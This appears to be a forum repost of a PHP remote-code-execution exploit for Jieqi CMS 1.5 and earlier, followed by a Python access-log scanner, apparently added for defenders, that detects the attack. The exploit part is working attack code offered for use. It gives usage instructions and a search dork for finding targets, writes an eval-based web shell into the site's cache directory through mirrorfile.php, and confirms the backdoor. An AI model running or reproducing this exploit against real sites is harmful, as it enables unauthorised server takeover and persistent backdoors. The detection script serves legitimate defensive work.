Author: flyh4t
Reposting an exp to welcome the New Year.
<?php
print_r('
+---------------------------------------------------------------------------+
Jieqi cms <= 1.5 remote code execution exploit
by Flyh4t
mail: [email protected]
team: http://www.wolvez.org
dork: "技术支持:杰奇网络"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to jieqi cms
Example:
php '.$argv[0].' localhost /
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$url = 'http://'.$host.$path.'mirrorfile.php?filename=cache/flyh4t.php&action=writetofile&content=';
$shell = 'http://'.$host.$path.'cache/flyh4t.php';
$cmd = urlencode("<?php @eval(/$_POST[wolvez]);?>test");
$str = file_get_contents($url.$cmd);
if ( file_get_contents($shell) == 'test')
    exit("Expoilt Success!/nView Your shell:/t$shell/n");
else
    exit("Exploit Failed!/n");
?>
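For defenders, the request pattern above (a `mirrorfile.php` call with `action=writetofile`, followed by a fetch of the file it named) can be hunted in web server access logs. The following is an added example, not part of the original post; the combined log format, the sample lines and the file name `x.php` are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_EXT_RE = re.compile(r'\.(?:php\d?|phtml|phar)$', re.I)

# Constructed sample log lines (documentation IPs, hypothetical file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:00:00:05 +0000] "GET /mirrorfile.php?filename=cache/x.php'
    '&action=writetofile&content=%3C%3Fphp+echo+1%3B%3F%3Etest HTTP/1.1" 200 0',
    '192.0.2.44 - - [01/Jan/2024:00:00:06 +0000] "GET /cache/x.php HTTP/1.1" 200 4',
    '192.0.2.10 - - [01/Jan/2024:00:00:09 +0000] "GET /mirrorfile.php?filename=cache/a.html HTTP/1.1" 200 12',
]

def classify(target):
    """Return (reasons, written_paths) for one request target."""
    url = urlsplit(target)
    q = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    if posixpath.basename(url.path).lower() != 'mirrorfile.php':
        return [], []
    if 'writetofile' not in (a.lower() for a in q.get('action', [])):
        return [], []
    reasons = ['writetofile action']
    names = q.get('filename', [])
    if any(SCRIPT_EXT_RE.search(n) for n in names):
        reasons.append('script extension in filename')
    if any('<?' in c for c in q.get('content', [])):
        reasons.append('PHP open tag in content')
    # The written file is addressed relative to the directory holding mirrorfile.php.
    base = posixpath.dirname(url.path)
    written = [posixpath.normpath(posixpath.join(base, n)) for n in names]
    return reasons, written

def scan(lines):
    """Flag write requests and any later fetch of a file they named."""
    written, findings = set(), []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons, paths = classify(m.group(1))
        written.update(paths)
        if not reasons and urlsplit(m.group(1)).path in written:
            reasons = ['fetch of file named in earlier write']
        if reasons:
            findings.append((lineno, reasons))
    return findings
```

`scan(SAMPLE_LOG)` flags the write on line 2 and the follow-up fetch on line 3; a hit with both a script extension and a PHP open tag warrants checking the `cache/` directory for unexpected `.php` files.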